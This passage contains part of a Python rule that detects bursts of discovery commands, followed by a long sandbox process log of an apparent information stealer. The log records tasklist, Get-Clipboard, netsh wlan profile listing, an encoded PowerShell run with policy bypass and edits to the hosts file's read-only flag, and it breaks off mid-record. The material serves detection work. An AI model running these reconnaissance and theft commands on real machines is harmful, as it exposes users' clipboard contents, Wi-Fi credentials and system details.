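    "T1115 Clipboard Data": re.compile(r"\bpowershell\b.*Get-Clipboard", re.I),
    "T1083 File and Directory Discovery": re.compile(r"\btree\b.*/A\s+/F", re.I),
    "T1016.002 Wi-Fi Discovery": re.compile(r"\bnetsh\b.*wlan\s+show\s+profile", re.I),
}

# cmd.exe /c wrappers and their conhost.exe children carry no signal on their
# own; a match is attributed to the nearest ancestor that is not one of these.
WRAPPERS = {"cmd.exe", "conhost.exe"}


def _basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def attribute(ev: ProcEvent, by_pid: dict) -> int:
    """Return the PID of the non-wrapper ancestor that launched this command."""
    cur = by_pid.get(ev.ppid)
    while cur is not None and _basename(cur.image) in WRAPPERS:
        cur = by_pid.get(cur.ppid)
    return cur.pid if cur is not None else ev.ppid


def detect_discovery_bursts(events, window=timedelta(seconds=60), min_techniques=3):
    """Flag each origin process that drives >= min_techniques distinct discovery
    commands inside `window`. Returns {origin_pid: sorted technique names}."""
    by_pid = {ev.pid: ev for ev in events}
    hits = defaultdict(list)  # origin pid -> [(timestamp, technique)]
    for ev in events:
        for name, rx in TECHNIQUES.items():
            if rx.search(ev.cmdline):
                hits[attribute(ev, by_pid)].append((ev.ts, name))
    flagged = {}
    for origin, seen in hits.items():
        seen.sort()
        # The same technique shows up twice per command (the cmd.exe wrapper and
        # its child); only distinct techniques count toward the threshold.
        techniques = sorted({name for _, name in seen})
        if len(techniques) >= min_techniques and seen[-1][0] - seen[0][0] <= window:
            flagged[origin] = techniques
    return flagged


T0 = datetime(2024, 11, 17, 5, 22, 7)  # start date/time as given in the report
# Constructed from the report's process tree. PIDs and the sample's path are
# made up; the command lines are the ones the sandbox recorded.
SAMPLE_EVENTS = [
    ProcEvent(T0, 100, 50, r"C:\Users\user\Desktop\program.exe", "program.exe"),  # hypothetical path
    ProcEvent(T0, 23, 100, r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"'),
    ProcEvent(T0, 18, 23, r"C:\Windows\System32\tasklist.exe", "tasklist /FO LIST"),
    ProcEvent(T0, 24, 23, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(T0, 19, 100, r"C:\Windows\System32\wbem\WMIC.exe",
              r"WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"),
    ProcEvent(T0, 20, 100, r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"'),
    ProcEvent(T0, 22, 100, r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c "tree /A /F"'),
    ProcEvent(T0, 25, 100, r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c "netsh wlan show profile"'),
    ProcEvent(T0 + timedelta(seconds=1), 26, 25, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Benign control: an administrator running a single inventory command from
    # an interactive PowerShell session five minutes later.
    ProcEvent(T0 + timedelta(minutes=5), 301, 302,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ProcEvent(T0 + timedelta(minutes=5), 300, 301, r"C:\Windows\System32\tasklist.exe", "tasklist /FO LIST"),
]


if __name__ == "__main__":
    for origin, techniques in detect_discovery_bursts(SAMPLE_EVENTS).items():
        print(f"origin pid {origin}: {len(techniques)} discovery techniques -> {techniques}")
```

The threshold is what keeps this usable: any one of these commands is routine for an administrator, so the rule fires only on the burst pattern, and attributing through cmd.exe and conhost.exe is what lets the alert name the stealer rather than a throwaway shell. Tune the window and threshold against your own telemetry before deploying.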
Target ID: 26
Start time: 05:22:08
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 05:22:08
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                            Imagebase:0x7ff77aff0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                                                                                                            Imagebase:0x7ff64dbf0000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                            Start time:05:22:10
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:05:22:10
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:05:22:10
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:05:22:10
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:05:22:10
Start date:17/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff73b8c0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:05:22:11
Start date:17/11/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:0x7ff78bf20000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:05:22:11
Start date:17/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:05:22:11
Start date:17/11/2024
Path:C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):false
Commandline:systeminfo
Imagebase:0x7ff73b070000
File size:110'080 bytes
MD5 hash:EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:05:22:12
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:05:22:12
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:05:22:12
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                            Imagebase:0x7ff71edc0000
                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

Target ID:56
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:0x7ff71edc0000
File size:23'040 bytes
MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
Imagebase:0x7ff631db0000
File size:2'759'232 bytes
MD5 hash:F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:05:22:13
Start date:17/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff73b8c0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:05:22:14
Start date:17/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff77aff0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                                            Imagebase:0x7ff7eee90000
                                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
                                                                                                                                                                                                                                            Imagebase:0x7ff6ba320000
                                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
